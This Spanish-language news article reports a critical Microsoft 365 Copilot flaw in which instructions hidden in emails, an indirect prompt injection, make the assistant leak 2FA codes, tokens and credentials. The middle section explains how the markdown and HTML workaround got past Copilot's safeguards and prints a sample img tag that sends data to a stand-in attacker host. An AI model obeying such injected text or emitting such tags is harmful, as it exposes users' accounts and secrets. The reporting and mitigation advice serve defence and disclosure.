Vulnerabilidad crítica en Copilot permite robar códigos 2FA

El pasado martes, Microsoft corrigió una vulnerabilidad calificada como crítica en su plataforma de inteligencia artificial Microsoft 365 Copilot. El lunes, los investigadores que descubrieron el fallo y lo reportaron a Microsoft revelaron cómo su prueba de concepto podía recuperar códigos de autenticación de dos factores (2FA) y otros datos sensibles de correos electrónicos accesibles por Copilot. La vulnerabilidad, identificada como CVE-2026-XXXX (aún no asignada públicamente), fue clasificada con una puntuación CVSS de 9.8 sobre 10, lo que subraya su gravedad. Según el informe de Ars Technica, el ataque explota la capacidad de Copilot para procesar correos electrónicos y otros contenidos, permitiendo la exfiltración de información sin interacción directa del usuario más allá de recibir un mensaje malicioso.

El origen del problema: la credulidad de los LLM

Microsoft y otros proveedores de modelos de lenguaje de gran escala (LLM) han sido incapaces de evitar que sus productos cumplan con solicitudes maliciosas para revelar datos. La causa raíz: los bots de IA no pueden distinguir entre instrucciones proporcionadas por los usuarios y aquellas escondidas en contenido de terceros que los modelos están resumiendo, redactando respuestas o utilizando para realizar otras acciones en nombre del usuario. Sin una forma de asegurar este límite crucial, Microsoft y sus pares se ven obligados a erigir barreras de seguridad complicadas y ad hoc para controlar las consecuencias de esta credulidad incurable. Este problema, conocido como 'inyección indirecta de prompts' (indirect prompt injection), fue documentado por primera vez por investigadores de la Universidad de Washington en 2023, y desde entonces se ha convertido en un desafío fundamental para la seguridad de los LLM. La falta de un mecanismo de aislamiento entre las instrucciones del usuario y el contenido de terceros es una debilidad arquitectónica que no tiene una solución trivial, ya que requeriría que el modelo distinga intencionalidad, algo que los LLM actuales no pueden hacer de manera confiable.

Saltando las barreras de seguridad

Una de las barreras integradas en Copilot y la mayoría de los LLM impide que envíen formularios web, correos electrónicos y realicen acciones similares que puedan usarse para extraer datos del usuario. Para sortear esto, los atacantes recurrieron al lenguaje de marcado, que permite agregar elementos de formato como encabezados, listas y enlaces sin necesidad de etiquetas HTML. Otra solución consiste en envolver datos sensibles dentro de etiquetas HTML como <img> y <form>. En ambos casos, una solicitud web que muestra los datos llega al servidor web del atacante, donde la información secreta se captura en los registros. Por ejemplo, si Copilot procesa un correo que contiene una etiqueta <img src="https://atacante.com/robar?dato=secreto">, el navegador o el propio Copilot podría intentar cargar esa imagen, enviando el dato al servidor del atacante. En la prueba de concepto reportada, los investigadores lograron extraer códigos 2FA, tokens de sesión y credenciales almacenadas en correos electrónicos, todo ello sin que el usuario hiciera clic en ningún enlace. El ataque funciona incluso si Copilot solo resume un correo, ya que el LLM puede interpretar las etiquetas ocultas como instrucciones para realizar acciones.

“La incapacidad de los LLM para distinguir entre instrucciones legítimas y maliciosas incrustadas en contenido de terceros es un problema fundamental que aún no tiene solución.”

Impacto y consecuencias

La vulnerabilidad afecta a todos los usuarios de Microsoft 365 Copilot que tengan habilitada la integración con correo electrónico y otras fuentes de datos. Un atacante podría enviar un correo electrónico aparentemente inofensivo que, al ser procesado por Copilot, desencadene la exfiltración de códigos 2FA, tokens de sesión o credenciales. Esto pone en riesgo la seguridad de cuentas corporativas y personales, permitiendo potencialmente el acceso no autorizado a sistemas críticos. Dado que Copilot tiene acceso a correos, calendarios, documentos y otras fuentes de datos de Microsoft 365, el daño potencial es masivo. Empresas que utilizan Copilot para automatizar flujos de trabajo podrían ver comprometidas sus cuentas de administrador, permitiendo a los atacantes leer todos los correos, modificar configuraciones o incluso acceder a servicios en la nube vinculados. Microsoft ya ha lanzado un parche, pero los expertos advierten que este tipo de vulnerabilidades son inherentes a la arquitectura actual de los LLM. Mientras no se resuelva el problema de la inyección indirecta de prompts, seguirán apareciendo fallos similares. De hecho, en los últimos dos años se han reportado vulnerabilidades similares en productos como ChatGPT, Google Bard y asistentes de código abierto, aunque el acceso privilegiado de Copilot a datos corporativos eleva la gravedad.

Qué deben hacer los usuarios

• Actualizar Microsoft 365 Copilot a la última versión disponible. El parche del 12 de junio de 2026 corrige esta vulnerabilidad específica, pero no protege contra futuras variantes.
• Revisar los registros de acceso y actividad para detectar posibles exfiltraciones. Buscar solicitudes a dominios desconocidos o inusuales en los logs de red.
• Implementar autenticación multifactor resistente a phishing, como llaves de seguridad FIDO2, que no dependen de códigos enviados por correo.
• Limitar el acceso de Copilot a datos sensibles mediante políticas de permisos. Por ejemplo, restringir qué buzones de correo puede leer Copilot o deshabilitar la integración con correo si no es estrictamente necesaria.
• Capacitar a los empleados para que reconozcan correos sospechosos, aunque el ataque no requiera interacción, la prevención sigue siendo clave.

Contexto histórico y comparaciones

Este incidente se suma a una larga lista de vulnerabilidades en asistentes de IA, como los ataques de inyección de prompts en ChatGPT y Google Bard. La diferencia clave es que Copilot tiene acceso privilegiado a datos corporativos (correos, calendarios, documentos), lo que amplifica el daño potencial. En 2023, investigadores demostraron ataques similares contra plugins de ChatGPT, logrando extraer datos de conversaciones. En 2024, se reportaron fallos en asistentes de IA de código abierto como Ollama, donde un prompt malicioso podía ejecutar comandos en el sistema. Sin embargo, el caso de Copilot es particularmente grave porque está integrado en el ecosistema empresarial de Microsoft, con millones de usuarios activos. Comparado con el ataque de inyección de prompts en Bing Chat de 2023, que permitía leer el historial de chat, este nuevo ataque va más allá al exfiltrar datos en tiempo real sin intervención del usuario. La industria está lejos de una solución definitiva. Mientras tanto, las empresas deben asumir que los LLM son inherentemente inseguros frente a contenido malicioso y adoptar medidas de defensa en profundidad. Microsoft, por su parte, ha anunciado que está trabajando en mecanismos de 'sandboxing' para aislar las instrucciones del usuario del contenido de terceros, pero aún no hay una fecha de implementación.